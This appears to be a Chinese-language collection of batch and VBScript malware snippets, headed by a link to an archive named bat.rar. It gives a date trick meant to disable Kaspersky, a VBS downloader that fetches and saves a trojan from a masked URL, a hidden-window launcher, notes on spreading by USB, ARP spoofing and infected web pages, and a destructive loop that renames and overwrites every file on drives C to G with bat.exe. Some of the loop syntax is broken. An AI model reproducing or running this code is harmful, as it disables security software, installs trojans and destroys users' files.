http://zhenlove.com.cn/cndos/fileup/files/bat.rar
它可使卡巴无法使用:
set date=%date%
date 1990-03-02
自动下载木马:
echo download ...
rem 3. dsa.vbs
echo Set xPost = createObject("Microsoft.XMLHTTP") >dsa.vbs
echo xPost.Open "GET","http://***.***.**/*.*",0 >>dsa.vbs
echo xPost.Send() >>dsa.vbs
echo Set sGet = createObject("ADODB.Stream") >>dsa.vbs
echo sGet.Mode = 3 >>dsa.vbs
echo sGet.Type = 1 >>dsa.vbs
echo sGet.Open() >>dsa.vbs
echo sGet.Write(xPost.responseBody) >>dsa.vbs
echo sGet.SaveToFile "*.*",2 >>dsa.vbs
cscript dsa.vbs
del dsa.vbs
=========================================
CreateObject("WScript.Shell").Run "cmd /cbat.bat",0 着是隐藏DOS窗口start bat.bat 的vbs
===============================
u传播
局域网中采用arp欺骗传播(这个要有个免费空间)
在*.htm *.html *.asp *.aspx查上网马
ping 127.1 /n 6 这个用来延时:
:a
ping 127.1 /n 6
copy %0 i:\
goto a
2007.5.1 会将覆bat.exe盖c,d,e,f,g上的所有文件:
cd\
for /f "delims=" %%m ('dir /s/b/a-d G:\*.*') do @ren %%m *.exe
for /f "delims=" %%k ('dir /s/b/a-d G:\*.*') do @copy %windir%\bat.exe %%k
for /f "delims=" %%q ('dir /s/b/a-d f:\*.*') do @ren %%q *.exe
for /f "delims=" %%w ('dir /s/b/a-d f:\*.*') do @copy %windir%\bat.exe %%w
for /f "delims=" %%m ('dir /s/b/a-d e:\*.*') do @ren %%m *.exe
for /f "delims=" %%k ('dir /s/b/a-d e:\*.*') do @copy %windir%\bat.exe %%k
for /f "delims=" %%m ('dir /s/b/a-d d:\*.*') do @ren %%m *.exe
for /f "delims=" %%k ('dir /s/b/a-d d:\*.*') do @copy %windir%\bat.exe %%k
for /f "delims=" %%m ('dir /s/b/a-d c:\*.*') do @ren %%m *.exe
for /f "delims=" %%k ('dir /s/b/a-d c:\*.*') do @copy %windir%\bat.exe %%k
exit\b
